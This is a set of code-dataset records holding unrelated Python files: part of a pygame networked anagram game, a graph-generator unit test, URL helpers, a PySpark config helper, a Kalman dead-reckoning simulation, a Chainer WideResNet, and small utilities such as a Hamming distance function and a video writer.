self.player2words_list[take_dict['opp_taken_is'][j]]\n\n for word in take_dict['opp_taken_words']:\n if word not in self.player2words_list:\n del self.player2words[word]\n\n if take_dict['self_taken_words'] or take_dict['opp_taken_words']:\n taken_words_string = ' '.join(\n str(take_dict['self_taken_words'] + take_dict['opp_taken_words']).split(\"'\")[1:-1])\n self.status = f\"Opponent took {taken_words_string} with {take_dict['new_word']}!\"\n else:\n self.status = f\"Opponent took {take_dict['new_word']} from the middle!\"\n\n self.graphics_to_update = self.graphics_to_update + ['tiles', 'playerwords', 'player2words',\n 'status', 'guess']\n\n self.graphics_to_update = self.graphics_to_update + ['tiles', 'playerwords', 'player2words',\n 'status', 'guess']\n\n self.who_took = robber\n self.new_word = take_dict['new_word']\n\n def update_graphics(self):\n if time_check:\n start_time = time.time()\n\n if 'flip' in self.graphics_to_update:\n self.flipSurfObj = self.fontObj_flip.render(self.flip_dict['flip_status'], True, color_flip)\n\n\n if 'tiles' in self.graphics_to_update:\n self.tilesSurfObj_list = []\n\n size_tiles, self.y_gap_tile, self.x_gap_tile = numtiles_to_fontsize(len(self.current))\n self.fontObj_tile = pygame.font.Font(font_words, size_tiles)\n\n for tile in self.current:\n self.tilesSurfObj_list.append(self.fontObj_tile.render(tile, True, color_tile))\n\n if 'playerwords' in self.graphics_to_update:\n self.playerwordsSurfObj_list = []\n\n size_words, self.y_gap_words = numwords_to_fontsize(len(self.playerwords_list))\n self.fontObj_words = pygame.font.Font(font_words, size_words)\n\n if self.who_took == 'self':\n new_word_i = self.playerwords_list.index(self.new_word)\n for i, word in enumerate(self.playerwords_list):\n if i == new_word_i:\n self.playerwordsSurfObj_list.append(self.fontObj_words.render(word, True, color_taken))\n else:\n self.playerwordsSurfObj_list.append(self.fontObj_words.render(word, True, color_words))\n else:\n for word in self.playerwords_list:\n self.playerwordsSurfObj_list.append(self.fontObj_words.render(word, True, color_words))\n\n if 'player2words' in self.graphics_to_update:\n self.player2wordsSurfObj_list = []\n\n size_opp_words, self.y_gap_opp_words = 
numwords_to_fontsize(len(self.player2words_list))\n self.fontObj_words = pygame.font.Font(font_words, size_opp_words)\n\n if self.who_took == 'opp':\n new_word_i = self.player2words_list.index(self.new_word)\n for i, word in enumerate(self.player2words_list):\n if i == new_word_i:\n self.player2wordsSurfObj_list.append(self.fontObj_words.render(word, True, color_taken))\n else:\n self.player2wordsSurfObj_list.append(self.fontObj_words.render(word, True, color_words))\n else:\n for word in self.player2words_list:\n self.player2wordsSurfObj_list.append(self.fontObj_words.render(word, True, color_words))\n\n if 'guess' in self.graphics_to_update:\n self.guessSurfObj = self.fontObj_guess.render('Take: ' + self.guess, True, color_guess)\n\n if 'status' in self.graphics_to_update:\n self.statusSurfObj = self.fontObj_status.render(self.status, True, color_status)\n\n self.graphics_to_update = []\n\n if time_check:\n end_time = time.time()\n self.time_dict['update_graphics'] = end_time - start_time\n\n def __display_text(self, SurfaceObj, x, y):\n textRectObj = SurfaceObj.get_rect()\n textRectObj.topleft = (x, y)\n DISPLAYSURF.blit(SurfaceObj, textRectObj)\n\n def __display_text_tiles(self, SurfaceObj, x, y):\n textRectObj = SurfaceObj.get_rect()\n textRectObj.center = (x, y)\n DISPLAYSURF.blit(SurfaceObj, textRectObj)\n\n def __can_take(self, take_dict):\n if not self.__superset(self.current, take_dict['used_tiles'], strict=False):\n return False\n elif not self.__superset(self.playerwords, take_dict['self_taken_words'], strict=False):\n return False\n elif not self.__superset(self.player2words, take_dict['opp_taken_words'], strict=False):\n return False\n else:\n return True\n\n def __reconcile_takes(self, dict1, dict2):\n combined_dict = {}\n for key in dict1:\n combined_dict[key] = dict1[key] + dict2[key]\n\n if not self.__superset(self.current, combined_dict['used_tiles'], strict=False):\n return False\n elif not self.__superset(self.playerwords, combined_dict['self_taken_words'], strict=False):\n return False\n elif not self.__superset(self.player2words, combined_dict['opp_taken_words'], strict=False):\n return False\n else:\n return True\n\n def __dict_supersedes(self, dict1, dict2):\n if not (dict1['self_taken_words'] == dict2['self_taken_words'] and dict1['opp_taken_words'] == dict2['opp_taken_words']):\n return None\n else:\n if self.__superset(dict1['new_word'], dict2['new_word'], strict=True):\n return 'one'\n elif self.__superset(dict2['new_word'], dict1['new_word'], strict=True):\n return 'two'\n else:\n return None\n\n def get_server_update(self):\n flip_waiting_recv = False\n\n if time_check:\n start_time = time.time()\n\n if time.time() - self.last_type > 0.2:\n # Get player 2 update\n print(\"Getting player 2 update!\")\n net_id_recv, self.seed_recv, self.last_update_recv, self.take_dict_recv, self.flip_dict_recv = self.parse_data(self.send_data())\n print(f\"Flip dict: {self.flip_dict_recv}\")\n\n if self.seed_recv < 1:\n print(\"No data...\")\n if self.mode == 'multiplayer':\n self.frozen = True\n\n # If 'waiting' mode and get a valid seed, player 2 has joined and you're ready to start multiplayer\n elif self.mode == 'waiting':\n self.mode = 'multiplayer'\n self.status = 'Player 2 joined. 
Starting multiplayer'\n self.graphics_to_update = self.graphics_to_update + ['status']\n else:\n self.frozen = False\n\n take_dict_recv = self.take_dict_recv\n\n if time_check:\n end_time = time.time()\n self.time_dict['send_parse'] = end_time - start_time\n\n if time_check:\n start_time = time.time()\n\n if not self.i_flipped and not self.flip_dict['flip_waiting'] and self.flip_dict_recv['flip_waiting']:\n self.flip_dict['flip_waiting'] = True\n self.flip_dict['flip_status'] = 'Ready...'\n self.flip_dict['scheduled_flip'] = self.flip_dict_recv['scheduled_flip']\n # if the scheduled flip time has already passed, there's a snafu, so flip\n print(\"Secondhand flip\")\n print(f\"Current time is {time.time()}\")\n print(f\"Gonna flip at {self.flip_dict['scheduled_flip']}\")\n if time.time() > self.flip_dict['scheduled_flip']:\n print(\"OOPS! Already flipped!!!\")\n self.flip()\n self.flip_dict['flip_waiting'] = False\n\n self.graphics_to_update = self.graphics_to_update + ['flip']\n self.last_update = self.last_update_recv\n\n if self.take_waiting and time.time() - self.take_waiting_time > 0.5:\n self.update_take('self', self.take_dict)\n self.take_waiting = False\n self.take_dict = self.__cleared_take_dict()\n self.last_update = time.time()\n\n # Check if other player has made a more recent update, meaning you would need to update your lists\n # Don't check for flips (because they are timed and independently done). Only check for takes\n # So in theory, the following should be triggered only if there's a take or a counter-update!\n if self.last_update_recv > self.last_update and not self.__is_cleared(self.take_dict_recv):\n if print_check:\n \"\"\"\n print(f\"Opponent's last update: {self.player2_last_update}\")\n print(f\"My last update: {self.last_update}\")\n print(f\"My take start time: {self.take_start_time}\")\n print(f\"Current: {self.current}\")\n print(f\"Tiles used from opponent: {used_tiles_recv}\")\n print(f\"Tiles used by me: {self.take_dict['used_tiles']}\")\n \"\"\"\n\n \"\"\"\n If opp last update more recent, get opp take dict\n - if not waiting, check if can take\n - if yes, great!\n - if no, earlier take wins, update_take that one\n - if i win, set last update to my time\n - if i lose, SNAFU: apologize and backtrack\n - if waiting, reconcile take dicts\n - if compatible, update_take both\n - if one supersedes the other, take that one\n - else earlier take wins, update_take that one\n - if i win, set last update to my time\n - no matter what, self.take_waiting = False\n \"\"\"\n\n if not self.take_waiting:\n if self.__can_take(take_dict_recv):\n self.update_take('opp', take_dict_recv)\n elif self.__dict_supersedes(self.take_dict_past, take_dict_recv) == 'two':\n new_dict = {}\n new_dict['new_word'] = take_dict_recv['new_word']\n new_dict['etyms_new_word'] = take_dict_recv['etyms_new_word']\n new_dict['take_time'] = take_dict_recv['take_time']\n new_dict['used_tiles'] = self.__subtract(take_dict_recv['used_tiles'] , self.take_dict_past['used_tiles'])\n new_dict['self_taken_words'] = self.take_dict_past['new_word']\n new_dict['opp_taken_words'] = []\n new_dict['self_taken_is'] = [self.playerwords.index(self.take_dict_past['new_word'])]\n new_dict['opp_taken_is'] = []\n\n self.update_take('opp', new_dict)\n elif self.take_dict_past['take_time'] < take_dict_recv['take_time']:\n self.last_update = time.time()\n else:\n print('SNAFU')\n self.status = 'SNAFU'\n self.graphics_to_update = self.graphics_to_update + ['status']\n\n # BACKTRACK\n\n self.tiles = self.tiles_past.copy()\n 
self.current = self.current_past.copy()\n self.playerwords = self.playerwords_past.copy()\n self.playerwords_list = self.playerwords_list_past.copy()\n self.player2words = self.player2words_past.copy()\n self.player2words_list = self.player2words_list_past.copy()\n\n self.update_take('opp', take_dict_recv)\n else:\n who_supersedes = self.__dict_supersedes(self.take_dict, take_dict_recv)\n if self.__reconcile_takes(self.take_dict, take_dict_recv):\n self.update_take('opp', take_dict_recv)\n self.update_take('self', self.take_dict)\n\n self.last_update = time.time()\n self.take_dict = self.__cleared_take_dict()\n elif who_supersedes == 'one':\n self.update_take('self', self.take_dict)\n self.last_update = time.time()\n self.take_dict = self.__cleared_take_dict()\n elif who_supersedes == 'two':\n self.update_take('opp', take_dict_recv)\n self.take_dict = self.__cleared_take_dict()\n elif self.take_dict['take_time'] <= take_dict_recv['take_time']:\n self.update_take('self', self.take_dict)\n self.last_update = time.time()\n self.take_dict = self.__cleared_take_dict()\n else:\n self.update_take('opp', take_dict_recv)\n self.take_dict = self.__cleared_take_dict()\n\n self.take_waiting = False\n\n if time_check:\n end_time = time.time()\n self.time_dict['update_players'] = end_time - start_time\n\n def printstatus(self):\n if time_check:\n start_time = time.time()\n\n # 'CURRENT'\n\n self.__display_text(self.currentSurfObj, x_current, y_current)\n\n # CURRENT TILES\n\n y_tile = y_tile_0\n x_tile = x_tile_0\n\n for i, tile in enumerate(self.tilesSurfObj_list):\n x_tile = x_tile + self.x_gap_tile\n\n self.__display_text_tiles(tile, x_tile, y_tile)\n\n if i % 20 == 19:\n y_tile = y_tile + self.y_gap_tile\n x_tile = x_tile_0\n\n # 'YOUR'\n\n self.__display_text(self.yourSurfObj, x_your, y_your)\n\n # YOUR WORDS\n\n x_words_local = x_words\n y_words_local = y_words\n\n for i, word in enumerate(self.playerwordsSurfObj_list):\n self.__display_text(word, x_words_local, y_words_local)\n\n if i % 10 == 9:\n x_words_local = x_words_local + x_gap_words\n y_words_local = y_words - self.y_gap_words\n\n y_words_local = y_words_local + self.y_gap_words\n\n # GUESS\n self.__display_text(self.guessSurfObj, x_guess, y_guess)\n\n if self.mode != 'solo':\n # 'OPPONENT'S'\n self.__display_text(self.oppSurfObj, x_opp, y_opp)\n\n # OPPONENT'S WORDS\n\n x_opp_words_local = x_opp_words\n y_opp_words_local = y_opp_words\n\n for i, word in enumerate(self.player2wordsSurfObj_list):\n self.__display_text(word, x_opp_words_local, y_opp_words_local)\n\n if i % 10 == 9:\n x_opp_words_local = x_opp_words_local + x_gap_opp_words\n y_opp_words_local = y_opp_words - self.y_gap_opp_words\n\n y_opp_words_local = y_opp_words_local + self.y_gap_opp_words\n\n # FLIP STATUS\n self.__display_text(self.flipSurfObj, x_flip, y_flip)\n\n # STATUS\n self.__display_text(self.statusSurfObj, x_status, y_status)\n\n if time_check:\n end_time = time.time()\n self.time_dict['display_graphics'] = end_time - start_time\n\ndef main():\n # Main game loop\n global FPSCLOCK, DISPLAYSURF\n pygame.init()\n\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n\n pygame.display.set_caption('Anagrams')\n\n game = banana()\n\n while True: # main game loop\n FPSCLOCK.tick(60)\n\n if time_check:\n start_loop = time.time()\n\n DISPLAYSURF.fill(BGCOLOR)\n\n if game.flip_dict['flip_waiting']:\n if time.time() >= game.flip_dict['scheduled_flip']:\n # print(\"Firsthand flip\")\n game.flip()\n 
game.flip_dict['flip_waiting'] = False\n\n for event in pygame.event.get():\n\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if game.frozen:\n game.status = 'Oops! Connection problem! Reconnecting...'\n game.graphics_to_update = game.graphics_to_update + ['status']\n\n elif not game.tiles and time.time() - game.last_update > 3:\n game.status = f\"No more tiles! Your score: {sum([len(i) for i in game.playerwords_list])}, Opponent's score: {sum([len(i) for i in game.player2words_list])}\"\n game.graphics_to_update = game.graphics_to_update + ['status']\n\n elif game.mode == 'waiting':\n if event.type == KEYDOWN and event.key == K_RETURN:\n game.mode = 'solo'\n game.status = 'Now playing solo'\n game.graphics_to_update = game.graphics_to_update + ['status']\n else:\n game.status = 'Waiting for other player... Press Enter to play solo'\n game.graphics_to_update = game.graphics_to_update + ['status']\n\n elif event.type == KEYDOWN:\n if event.key == K_BACKSPACE:\n if game.guess == '':\n pass\n else:\n # Delete one letter from the guess\n game.guess = game.guess[:-1]\n game.graphics_to_update = game.graphics_to_update + ['guess']\n game.last_type = time.time()\n\n elif event.key == K_SPACE:\n # Don't do anything if input is a space\n pass\n\n elif event.key == K_RETURN:\n # if Return and no guess is present, then flip next tile. If guess is present, see if it's a take\n if game.guess == '':\n if game.mode != 'solo':\n game.flip_dict['flip_waiting'] = True\n game.flip_dict['flip_status'] = 'Ready...'\n game.graphics_to_update = game.graphics_to_update + ['flip']\n game.last_update = time.time()\n game.flip_dict['scheduled_flip'] = time.time() + 1\n game.i_flipped = True\n\n print(\"Firsthand flip\")\n print(f\"Current time is {time.time()}\")\n print(f\"Gonna flip at {game.flip_dict['scheduled_flip']}\")\n else:\n game.flip()\n\n else:\n game.take(game.guess.upper())\n\n elif event.key in letter_keys:\n # if letter is typed then add it to the current guess\n game.guess = game.guess + event.unicode.upper()\n game.graphics_to_update = game.graphics_to_update + ['guess']\n game.last_type = time.time()\n\n if game.mode != 'solo':\n game.get_server_update()\n\n if game.i_flipped and game.flip_dict['flip_waiting']:\n game.flip_dict['flip_waiting'] = False\n game.i_flipped = False\n\n game.update_graphics()\n game.printstatus()\n pygame.display.update()\n\n if time_check:\n end_loop = time.time()\n loop_time = end_loop - start_loop\n game.time_dict['loop'] = loop_time\n\n if loop_time > 0.1:\n print(f\"Delay: {game.time_dict}\")\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","sub_path":"anagrams_network7_new.py","file_name":"anagrams_network7_new.py","file_ext":"py","file_size_in_byte":42941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"386336680","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/apgl/generator/test/BarabasiAlbertGeneratorTest.py\n# Compiled at: 2011-05-06 16:11:42\nimport unittest, logging\nfrom apgl.generator.BarabasiAlbertGenerator import BarabasiAlbertGenerator\nfrom apgl.graph.VertexList import VertexList\nfrom apgl.graph.SparseGraph import SparseGraph\n\nclass BarabasiAlbertGeneratorTest(unittest.TestCase):\n\n def testGenerate(self):\n numFeatures = 1\n numVertices = 20\n vList = VertexList(numVertices, 
numFeatures)\n        graph = SparseGraph(vList)\n        ell = 2\n        m = 0\n        generator = BarabasiAlbertGenerator(ell, m)\n        graph = generator.generate(graph)\n        self.assertEquals(graph.getNumEdges(), 0)\n        ell = 5\n        graph.removeAllEdges()\n        generator.setEll(ell)\n        graph = generator.generate(graph)\n        self.assertEquals(graph.getNumEdges(), 0)\n        ell = 2\n        m = 1\n        graph.removeAllEdges()\n        generator.setEll(ell)\n        generator.setM(m)\n        graph = generator.generate(graph)\n        self.assertEquals(graph.getNumEdges(), (numVertices - ell) * m)\n        m = 2\n        graph.removeAllEdges()\n        generator.setM(m)\n        graph = generator.generate(graph)\n        self.assertEquals(graph.getNumEdges(), (numVertices - ell) * m)\n\n    def testGraphDisplay(self):\n        try:\n            import networkx, matplotlib\n        except ImportError as error:\n            logging.debug(error)\n            return\n\n        numFeatures = 1\n        numVertices = 20\n        vList = VertexList(numVertices, numFeatures)\n        graph = SparseGraph(vList)\n        ell = 2\n        m = 2\n        generator = BarabasiAlbertGenerator(ell, m)\n        graph = generator.generate(graph)\n        logging.debug(graph.degreeDistribution())\n        nxGraph = graph.toNetworkXGraph()\n        nodePositions = networkx.spring_layout(nxGraph)\n        nodesAndEdges = networkx.draw_networkx(nxGraph, pos=nodePositions)\n\n\nif __name__ == '__main__':\n    unittest.main()","sub_path":"pycfiles/apgsa-0.0.3-py3-none-any/BarabasiAlbertGeneratorTest.py","file_name":"BarabasiAlbertGeneratorTest.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"218795365","text":"import re\n\nREGEX_DOMAIN = re.compile(r'(https{0,1}:\\/\\/[a-zA-Z0-9.]{1,})')\nREGEX_HTTP_S = re.compile(r'https{0,1}:\\/\\/')\nREMOVE_NL = re.compile(r'\\n{0,}')\n\n\ndef get_domain(url):\n    \"\"\" Gets the domain from a URL. \"\"\"\n    return REGEX_DOMAIN.findall(url)[0]\n\n\ndef get_path_by_url(url):\n    url = REMOVE_NL.sub('', url)\n    path = REGEX_HTTP_S.sub('', url)\n    if path[-1] == '/':\n        path = path[:-1]\n    lastWord = path.split('/')[-1]\n    newLaswWord = ''\n    if '.' in lastWord:\n        newLaswWord = lastWord.split('.')[0] + '.txt'\n    else:\n        newLaswWord = lastWord + '.txt'\n    \n    return path.replace(lastWord, ''), newLaswWord\n\n\ndef find_argument(key: str, arguments: list):\n    \"\"\" Search for an argument by key \"\"\"\n    for argument in arguments:\n        if f'--{key}' in argument and '=' in argument:\n            return argument.split('=')[1]\n    return None","sub_path":"Dependencies/handler_funcs.py","file_name":"handler_funcs.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"319011871","text":"from pyspark.sql import SparkSession\n\ndef get_spark_session(execution_mode):\n    \"\"\"\n    Creating SparkSession object\n    :param execution_mode:\n    :return:\n    \"\"\"\n    spark_session = SparkSession.builder.appName(\"HelloFreshRecipes\").master(execution_mode).enableHiveSupport().getOrCreate()\n    return spark_session\n\ndef get_config(spark_session,config):\n    \"\"\"\n    Initialize parameters from props file\n    :param spark_session:\n    :param config:\n    :return:\n    \"\"\"\n\n    hadoop_conf= spark_session._jsc.hadoopConfiguration()\n    hadoop_conf.set(\"com.amazonaws.services.s3.enableV4\", \"true\")\n    aws_profile = config.get(\"aws_profile\")\n    aws_region = config.get(\"aws_region\")\n    s3_bucket = config.get(\"s3_bucket\")\n    access_id = config.get(aws_profile, \"aws_access_key_id\")\n    access_key = config.get(aws_profile, \"aws_secret_access_key\")\n\n    return(aws_profile,aws_region,s3_bucket,access_id,access_key)\n\ndef get_logger(spark_session):\n    log4j = spark_session._jvm.org.apache.log4j\n    logger = log4j.LogManager.getLogger(__name__)\n    return logger","sub_path":"recipes-etl/src/main/python/utils/SparkConfigProvider.py","file_name":"SparkConfigProvider.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"443334429","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nfrom roblib import *\n\ndef dreadreckoning2(lim=50, tempsLim=50, dt=0.01):\n    \n\n    x = array([[0],\n               [0],\n               [0],\n               [6],\n               [0.1]\n               ])\n\n    def f(x,u): \n        xdot= array([x[3] * cos(x[4]) * cos(x[2]),\n                     x[3] * cos(x[4]) * sin(x[2]),\n                     x[3] * sin(x[4]) / 3,\n                     u[0],\n                     u[1]\n                     ])\n        return xdot\n    \n    zhat = array([x[0],x[1],x[3]])\n    Gzhat = zeros((3,3))\n    Galphaz = dt* diag([0.02, 0.02, 0.06])\n    Galphax = dt* diag([0, 0, 0.02, 0.02, 0.06])\n    \n\n    for t in arange(0, tempsLim, dt):\n        cla()\n        alphax = mvnrnd2(array([0,0,0,0,0]),Galphax)\n        ux = array([[0],[0]])\n\n# Euler\n#    x = x + f(x,ux) * dt + alphax\n    \n# Runge-Kutta\n        tempX = x + (2/3) * dt * f(x, ux)\n        tempU = (2/3) * dt * ux\n        x = x + dt * (0.25 * f(x, ux) + (3/4) * f(tempX, tempU)) + alphax\n        \n        uz = array([[0],\n                    [0],\n                    [dt* ux[0]]\n                    ])\n        \n        Ak = array([[1, 0, cos(x[4]) * cos(x[2])],\n                    [0, 1, cos(x[4]) * sin(x[2])],\n                    [0, 0, 1]\n                    ])\n        \n        y = x[3] + mvnrnd2(array([0]), 0.1 * eye(1))\n        C = array([[0,0,1]])\n        Gbeta = 0.01\n        \n        zhat,Gzhat= kalman(zhat,Gzhat,uz,y,Galphaz,Gbeta,Ak,C)\n        \n        draw_ellipse(x[0:2], Gzhat[0:2, 0:2], 0.9, ax, 'r')\n        draw_car(x)\n        ax.set_xlim(-lim,lim)\n        ax.set_ylim(-lim,lim)\n        pause(0.01)\n\nplt.close(\"all\")\nfig = plt.figure(\"Deadreckoning2\")\nax = fig.add_subplot(1, 1, 1)\nplt.show()\ndreadreckoning2()\n","sub_path":"python/Eval/Eval22.py","file_name":"Eval22.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"49727714","text":"#!/usr/bin/env python\n# -*- coding: utf-8 
-*-\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer.initializers import normal\nimport collections\nfrom .pgp_lib import pgp\n\n\nclass PreBuildingBasicBlock(chainer.link.Chain):\n\n \"\"\"A building block that consists of several Basic layers.\n\n Args:\n n_layer (int): Number of layers used in the building block.\n in_channels (int): Number of channels of input arrays.\n out_channels (int): Number of channels of output arrays.\n stride (int or tuple of ints): Stride of filter application.\n initialW (4-D array): Initial weight value used in\n the convolutional layers.\n \"\"\"\n\n def __init__(self, n_layer, in_channels,\n out_channels, stride, initialW=None):\n super(PreBuildingBasicBlock, self).__init__()\n with self.init_scope():\n self.a = PreBasicA(in_channels, out_channels, stride, initialW)\n self._forward = [\"a\"]\n for i in range(n_layer - 1):\n name = 'b{}'.format(i + 1)\n basic = PreBasicB(out_channels, initialW)\n setattr(self, name, basic)\n self._forward.append(name)\n\n def __call__(self, x):\n for name in self._forward:\n layer = getattr(self, name)\n x = layer(x)\n return x\n\n @property\n def forward(self):\n return [getattr(self, name) for name in self._forward]\n\n\nclass PreBasicA(chainer.link.Chain):\n\n def __init__(self, in_channels, out_channels, stride=2, initialW=None):\n super(PreBasicA, self).__init__()\n\n self.stride = stride\n with self.init_scope():\n self.bn1 = L.BatchNormalization(in_channels)\n self.conv1 = L.Convolution2D(\n in_channels, out_channels, 3, 1, 1, initialW=initialW,\n nobias=True)\n self.bn2 = L.BatchNormalization(out_channels)\n self.conv2 = L.Convolution2D(\n out_channels, out_channels, 3, 1, 1, initialW=initialW,\n nobias=True)\n self.conv3 = L.Convolution2D(\n in_channels, out_channels, 1, 1, 0, initialW=initialW,\n nobias=True)\n\n def __call__(self, x):\n h0 = F.relu(self.bn1(x))\n h1 = self.conv1(h0)\n if self.stride == 2:\n h1 = self.conv2(F.dropout(pgp(F.relu(self.bn2(h1)), 2), 0.3))\n h2 = self.conv3(pgp(h0, 2))\n else:\n h1 = self.conv2(F.dropout(F.relu(self.bn2(h1)), 0.3))\n h2 = self.conv3(h0)\n return h1 + h2\n\n\nclass PreBasicB(chainer.link.Chain):\n\n def __init__(self, in_channels, initialW=None):\n super(PreBasicB, self).__init__()\n with self.init_scope():\n self.bn1 = L.BatchNormalization(in_channels)\n self.conv1 = L.Convolution2D(\n in_channels, in_channels, 3, 1, 1, initialW=initialW,\n nobias=True)\n self.bn2 = L.BatchNormalization(in_channels)\n self.conv2 = L.Convolution2D(\n in_channels, in_channels, 3, 1, 1, initialW=initialW,\n nobias=True)\n\n def __call__(self, x):\n h = self.conv1(F.relu(self.bn1(x)))\n h = self.conv2(F.dropout(F.relu(self.bn2(h)), 0.3))\n return h + x\n\n\nclass WideResNet_PGP(chainer.Chain):\n\n def __init__(self, n_layers, n_out, k=1, layer_names=None):\n super().__init__()\n kwargs = {'initialW': normal.HeNormal(scale=1.0)}\n\n if (n_layers - 4) % 6 == 0:\n block = [(n_layers - 4) // 6] * 3\n else:\n raise ValueError(\n 'The n_layers argument should be mod({} - 4, 6) == 0, \\\n but {} was given.'.format(n_layers, n_layers))\n\n with self.init_scope():\n self.conv1 = L.Convolution2D(3, 16, 3, 1, 1, **kwargs)\n self.res2 = PreBuildingBasicBlock(\n block[0], 16, 16 * k, 1, **kwargs)\n self.res3 = PreBuildingBasicBlock(\n block[1], 16 * k, 32 * k, 2, **kwargs)\n self.res4 = PreBuildingBasicBlock(\n block[2], 32 * k, 64 * k, 2, **kwargs)\n self.bn4 = L.BatchNormalization(64 * k)\n self.fc5 = L.Linear(64 * k, n_out)\n\n self.functions = 
collections.OrderedDict([\n            ('conv1', [self.conv1]),\n            ('res2', [self.res2]),\n            ('res3', [self.res3]),\n            ('res4', [self.res4]),\n            ('pool4', [self.bn4, F.relu, lambda x: F.average(x, axis=(2, 3))]),\n            ('fc5', [self.fc5]),\n        ])\n\n        if layer_names is None:\n            layer_names = list(self.functions.keys())[-1]\n        if (not isinstance(layer_names, str) and\n                all([isinstance(name, str) for name in layer_names])):\n            return_tuple = True\n        else:\n            return_tuple = False\n            layer_names = [layer_names]\n        self._return_tuple = return_tuple\n        self._layer_names = layer_names\n\n    def __call__(self, x):\n        h = x\n\n        activations = dict()\n        target_layers = set(self._layer_names)\n        for key, funcs in self.functions.items():\n            if len(target_layers) == 0:\n                break\n            for func in funcs:\n                h = func(h)\n            if key in target_layers:\n                activations[key] = h\n                target_layers.remove(key)\n\n        if self._return_tuple:\n            activations = tuple(\n                [activations[name] for name in self._layer_names])\n        else:\n            activations = list(activations.values())[0]\n        return activations\n\n    def extract(self, images, layers=['fc5']):\n        self._layer_names = layers\n        x = chainer.Variable(self.xp.asarray(images))\n        h = self(x).data\n        _len, _cls = h.shape\n        h = F.average(F.reshape(h, (16, _len // 16, _cls)), axis=0)\n        return chainer.cuda.to_cpu(h.data)\n","sub_path":"models/wideresnet_pgp.py","file_name":"wideresnet_pgp.py","file_ext":"py","file_size_in_byte":5934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"559736493","text":"def distance(strand_a, strand_b):\n    if len(strand_a) != len(strand_b):\n        raise ValueError('Sequences must be of same length.')\n\n    distance = 0\n\n    for i, c in enumerate(strand_a):\n        if c != strand_b[i]:\n            distance += 1\n\n    return distance","sub_path":"hamming/hamming.py","file_name":"hamming.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"299027454","text":"from __future__ import division, print_function\nimport cv2\nimport platform\nimport os\n\n\ndef videoWrite(frames, fname='out.mp4', fps=30):\n    shape = frames[0].shape\n    \n    frame_height, frame_width = shape[:2]\n    \n    # video writer doesn't like grayscale images, have\n    # to convert to RGB\n    if len(shape) == 2:\n        grayscale = True\n    else:\n        grayscale = False\n    \n    # pick a good encoder for the current OS\n    sys = platform.system().lower()\n    if sys in ['darwin']:\n        fourcc = 'avc1'\n    else:\n        fourcc = 'mjpg'\n    \n    print('>> Saving {} {}x{} images to {}'.format(len(frames), shape[1], shape[0], fname))\n    print('>> using {} on {}'.format(fourcc, sys))\n    \n    # create the video writer and write all frames to the file\n    out = cv2.VideoWriter(\n        fname,\n        cv2.VideoWriter_fourcc(*fourcc), \n        fps, \n        (frame_width,frame_height))\n    \n    for frame in frames:\n        # convert if necessary to RGB\n        if grayscale:\n            frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2RGB)\n        out.write(frame)\n    \n    out.release()\n    print('>> wrote {:.1f} MB'.format(os.path.getsize(fname)/(1E6)))\n","sub_path":"opencvutils/video_write.py","file_name":"video_write.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"316382117","text":"class MedianFinder(object):\n\n    def __init__(self):\n        \"\"\"\n        initialize your data structure here.\n        \"\"\"\n        self.odd = False\n        self.mid = -1\n        self.array = []\n\n    def addNum(self, num):\n        \"\"\"\n        :type num: int\n        :rtype: None\n        \"\"\"\n        self.array.append(num)\n        self.odd = bool(1 - self.odd)\n        if self.odd:\n            self.mid += 1\n\n    def findMedian(self):\n        \"\"\"\n        :rtype: float\n        \"\"\"\n        # keep the buffer ordered so the middle index really is the median\n        self.array.sort()\n        if self.odd:\n            return self.array[self.mid]\n        else:\n            return (self.array[self.mid] + self.array[self.mid + 1]) / float(2)\n\n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()\nmedianFinder = MedianFinder()\nmedianFinder.addNum(1)\nmedianFinder.addNum(2)\nprint(medianFinder.findMedian())\n","sub_path":"findKthLargest.py","file_name":"findKthLargest.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
